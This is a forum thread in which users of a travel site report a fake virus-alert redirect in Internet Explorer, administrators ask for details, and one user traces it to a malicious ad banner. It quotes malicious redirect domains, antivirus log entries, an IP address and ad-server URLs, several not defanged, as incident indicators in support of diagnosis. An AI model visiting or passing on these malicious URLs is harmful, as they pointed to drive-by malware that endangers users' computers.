+1.

Cheers.

Fair enough; but you may want to consider switching browsers because both Firefox and Chrome are more robust and less prone to security holes than IE, irrespective of this particular issue.

You've been posting this same update almost verbatim for a week. We already know we don't have a virus unless we click on the link. What we don't know is why it's taking so long for you to make progress on this. It isn't as if it's a rare and difficult to duplicate problem.

This one

http://i71.photobucket.com/albums/i1...an/suspect.jpg

If you look above, some members are either requesting an update, or have not read the updates we've posted and are stating that no admins are responding. This serves both purposes.

Internally we have not yet seen the false virus alert, even on IE, making this very difficult to resolve.

Paul

Have you guys invested in Mozilla or hold stock in Google?! Asking people to switch browsers is NOT a solution and shouldn't even be mentioned as a fix to your issue. You may as well ask people to blog elsewhere as a solution.

The browser is NOT the cause. FT is.

Correct -- which is why we're proposing it as a temporary workaround rather than as a "solution" ;)

Paul

IBobi, I just got a screenshot of the image, but how do I either post it online or send it to you via PM? I saved it to a jpeg file and have it on desktop.

The image shows "Introducing the NEW Citi/Aadvantage Card" and "FlyertalkForums." It appeared when I first opened IE, at which point I got a screenshot--Start/Programs/ABBYY Screenshot Reader. At the top of the screen, the url starts, http://cleaninspectionreliability.pl [etc.].

After I got the screen, I closed the laptop, then reopened it and again opened IE, this time no problems (so far).

Okay, while surfing around FT and upon clicking to check on the Support sub-forum's page, the following pop-up displayed on my Dell laptop (running Windows 7 Ultimate, SP1 with latest security patches & update, aVast! Antivirus and ZoneAlarm - under Internet Explorer V9 (256-bit)

*** Caution/Warning/Notes: - I inserted extra spaces in between to avoid anyone accidentally clicking on it & getting "trapped" - especially on less secured PC vulunerable to these junks !! ***

http : //cleaninspectionreliability . pl/f169m/al/78dee9e271084cb2/196/

I was able to move away from this pop-up page, without doing a forced shutdown via the Task Manager, etc.

Switching to Firefox to check the page, I'm getting an alert about Citi AmericanAirlines AAdvantage advertisement link as being an untrusted connection - (graphics-based or embedded links/websites were linked on CC as being the likely source and origin of the infection)

creditcards.citicards.com uses an invalid security certificate. The certificate is not trusted because no issuer chain was provided. (Error code: sec_error_unknown_issuer)

If you understand what's going on, you can tell Firefox to start trusting this site's identification. Even if you trust the site, this error could mean that someone is tampering with your connection. Don't add an exception unless you know there's a good reason why this site doesn't use trusted identification.

This (virus warning) happens on one of my computers when browsing FT pretty regularly. On my other computer it doesn't seem to happen. Regardless, as I can reproduce at a high frequency, I will be willing to assist in finding the problem. If I need to do anything specific (like turning debug mode or capture wireshark trace) then let me know.

Posting the same words saying "we're looking into it" isn't an update. If you were taking this seriously, there would be something more to report.

This part actually IS an update. Any reason you haven't told us that before?

A lot of people are having this problem and maybe they can help you reproduce it.

Crap. Now I'm getting it too on IE on my laptop. Switched to iPhone but come on guys, you're all exposing us here and if/when someone gets infected you're going to get sued. All for the sake of not killing your ads/revenue while you troubleshoot.

Do what we did in my previous help desk days. Kill all ads, then bring them back one by one. When people scream, you have a winner.

I'm not at IT person, so apologies if this is of no use at all to the investigation. This is my history from AVG showing the report of each time it stopped IE when I opened Flyertalk.

As you can see - it's an exploit rogue scanner, type 1929. Whatever that means.

"Exploit Rogue Scanner (type 1929)";"reliabilityprotectlow.pl/fq2f8o/al/78dee9e271084cb2/pr2/196/";"Object was blocked";"30/07/2012, 22:58:43";"file";"C:\Program Files (x86)\Internet Explorer\iexplore.exe"

"Exploit Rogue Scanner (type 1929)";"protecttoolsmicrosoft.pl/n7065jpi/al/78dee9e271084cb2/pr2/196/";"Object was blocked";"29/07/2012, 22:06:10";"file";"C:\Program Files (x86)\Internet Explorer\iexplore.exe"

"Exploit Rogue Scanner (type 1929)";"testpreventionremedy.pl/wd9ih3904/ss/78dee9e271084cb2/pr2/196/";"Object was blocked";"19/07/2012, 12:46:43";"file";"C:\Program Files (x86)\Internet Explorer\iexplore.exe"

The latest redirect site: http://urlquery.net/report.php?id=108921

The redirects appear to be always to *.pl domain with the same Turkish IP address (31.210.109.37). Everyday a new *.pl domain is being used because the existing ones are being closed down - http://support.clean-mx.de/clean-mx/...t=first%20desc

Other forums (http://www.quartertothree.com/game-t....php?p=3182083) on the net have also reported redirect problems to an identical IP address.

Again, I think it is highly unlikely this redirect is coming from an advertisment. It is more likely to be an exploit in a script (java/php) run on this site.

Thanks, Paul. Two issues:

(1) Since your more recent post indicates that you haven't seen the false virus alert yet, and since I gather that not all IE users have seen it, it would be interesting to see if maybe there might be a common denominator?


(2) After you have found and corrected the problem, could you please again issue us an assurance as to the malware question? Appreciate the earlier reassurance, and hope you are right, but since you haven't encountered the problem yourselves, is it possible yet to be certain that this thing is not installing something? (I understand that from the IT standpoint it might be possible to be certain that it isn't. I am definitely not IT-savvy, hence my question.)

This shouldn't take a week to fix.

Hell, it shouldn't take a day.

Now you are moving into the realm of opinion. I like others will not change because one minor site I visit (Flyertalk) is not up to the challenge. I have things that will not work on FF or Chrome and I do not add software to my machines on a whim.

Anyone who is seeing this alert, could you please post your browser type and version, and post the steps you take to get to the site and the source code if possible (you can get this by right-clicking and selecting "view source").

Thank you!

Paul

Since I pay to not see ads,
it seems I am missing out on all the fun.

Therefore, when it comes time to renew...
no more money for IB from me. :td:

I'm subscribed to this thread and got an email alert about this new posting. Clicking on the link to the thread in the email brought up the ususal virus alert.

IE 9

Happens when you manually input the address in the address bar, via google.com, favourites or history.

Can't post the source code when it happens because the redirection is happening before the page loads. Avast is picking it up as URL:Mal - HTTP/1.1 301 but doesn't list the offending problem. I have installed a logger to pick up where the redirecting is originating from.

Paging Sargent Schultz, paging Sargent Schultz...

I am using Chrome these days but switch to IE to see if the problem is still there. I tested it a few minutes ago and it happened again. This time it happened when I just typed in www.flyertalk.com. I had just clicked on Forums as well, and almost instantly there was the virus-alert screen. This time, however, there was one change to the virus-alert screen. Instead of the FT background, in which we can see the rest of the FT screen, this time the entire screen, except for the alert, was blank. I did a snip-and-save, if you want it, though I don't know how to send a jpg file via PM or to post it online. Unfortunately, the snip didn't save the http: portion of the screen. However, visible on the bottom toolbar are the words, "Viruses were found" in one box and in the next, "Flyertalk Forums."

I tried to right-click on "view source," per your post above, but couldn't. Right-clicking, any clicking, nothing, worked. One more thing changed, however, in addition to the all-white screen background. I was able to shut the screen down with Ctrl Alt Del and in the past even that procedure has not worked.

I think that the posters who say that this screen hits once a day are onto something. I think it usually--but not always--has appeared once/day. Not a hundred percent, however.

There was what might be another possible oddity following my turning the laptop off and turning it back on. After I turned it back on, this time, and opened IE and FT again, FT went blank for a split second, then came back on. So I am wondering if the appearance of the "false virus" screen does do something to the browser or computer, at least for the day?

Has anyone with an ads-free account (Faces of FlyerTalk, for example) been subjected to the redirect/virus warning?

Note that if you ever visit FlyerTalk without logging in, your ads-free status does not apply then, and an ad could cause this warning.

Thank you,

Paul

Paul,

I went to http://www.flyertalk.com/forum/usercp.php to try logging in to test your question.

I got the login page and immediately got hit with the "virus warning."

This time, though, my own (real) MSE detected that a virus had been installed (just from going to the page!).

http://www.microsoft.com/security/po...tid=2147638814

So, I couldn't actually login before getting infected.

This is nasty stuff.

I'm not inclined to want to try to test more in case whatever the next re-direct/hijack is manages to actually damage my computer with something that my AV program misses.

What is a free ads account and how do you get one?

And the alert always appears very very soon from typing in the Flyertalk URL so I doubt people had a chance to logon before there were molestered with this warning.

I usually type ww.flyert and then suggestions appear and I click straight onto BA executive club and the warning appears every time I have not accessed the site for a while without fail.

Maybe you could ask people to fill in a small questionnaire to agther similar characteristics and to be able to replicate the problem.

IE 9
shortcut in favorites to : http://www.flyertalk.com/forum/

also does in on IE 8 on laptop - same shortcut

Most recent warning for me was yesterday morning. Later in the evening no problem, and this afternoon was okay also. Coincidence, or does time of day (in my case the most warnings have popped up usually very early 3-4 AM eastern time, or a bit later in the morning) have anything to do with it occuring?

Anyone seeing something similar timewise?

bj-21.

If I am up late I seem to get it a few minutes after midnight

As noted by others, I generally get only one per 24 hour period.

I'm exactly the same as this.

After advice on this forum I started using Chrome when accessing Flyertalk and have had no problems with this fake virus thing....yesterday I mistakenly used IE and lo and behold up pops the virus warning so if you can use Chrome!

Started using Chrome also, though I use it for all websites not just FT. Another benefit is that it seems to run much faster than IE. Probably won't go back to IE. FT must own stock in Google.

It is only happening for me when I am logged in - if I am logged out/cookies cleared, it doesn't seem to happen.

Can we have a little more feedback as to why this hasn't been repaired yet? I even sent screen shots and didn't even received an acknowledgement.

With all due respect11 days (with all the expert organisations available) to help detect and kill this issue feels to me like around 8 days longer than it should be. All feels as though the response is out of kilter with the urgency.

A new screen appeared today, when I used Chrome. Sgnificance: I think some IE material might have been residual when I went to Chrome.

Sequence of events:

(1) Browsed Internet (CNN), using IE. (My IE browser is set to delete cookies whenever IE browser is closed.)
(2) Still in IE, went to FlyerTalk.
(3) Clicked on Forums.
(4) Virus-alert message appeared, on an all-white background, without any Flyertalk screen in the background. Made a snip.
(5) Tried to right-click for page source but nothing worked except Ctrl Alt Del.
(6) Turned computer off, using on-off button.
(7) Turned computer back on. (Note that at this point IE had not been automatically closed down, which would have deleted cookies automatically--though of course it did not reopen when I restarted the computer.)
(8) Opened Chrome. (IE is still off.) Went to Flyertalk.
(9) Could not open Chrome, got a new screen box, which read:

(10) Checked IE for residual cookies, found a Favicon (right-clicking showed this as owned by Flyertalk), and an "IE9 CompatViewList.xml", which rightclicking on showed as owned by Microsoft.

I can send a snip of the new screen but would need instructions on how to PM a jpg file.

Urgent @ Admin

I have found the source of the redirect (all links have been delibrately broken by me in the http bit to inadvertently stop any users clicking on them):

It is coming from the HotelDetect banner (which is hosted here hxxp://adliclick.com/banner.php?campaign_id=12175&rc=475737972919972). This is a copy of the request header:


This appears to be a bogus site.

The above banner page contains the following malicious code:

The iframe within this code is redirecting to a html page (hxxp://adbitserver.com/in?q=LfCAhlbgw9cnPT8tAbM5uSk36uh4OyeQxol9XkHX) which contains the following HTML code:

I cannot find exactly where the source for the adliclick.com is coming from in your source code (I strongly suggest checking all your scripts for references to it), but I have a copy of the source codes from all sites when the redirect hit me. Let me know if you want copies.

Good job MoneyBagger. (Work that should have been done by IB/Flyertalk over a week ago.)

Nice work MoneyBagger.

^ Good job.

Just for my academic interest, how hard was this to work out? Was it something that any competent IT person could work out, or was it more specialised?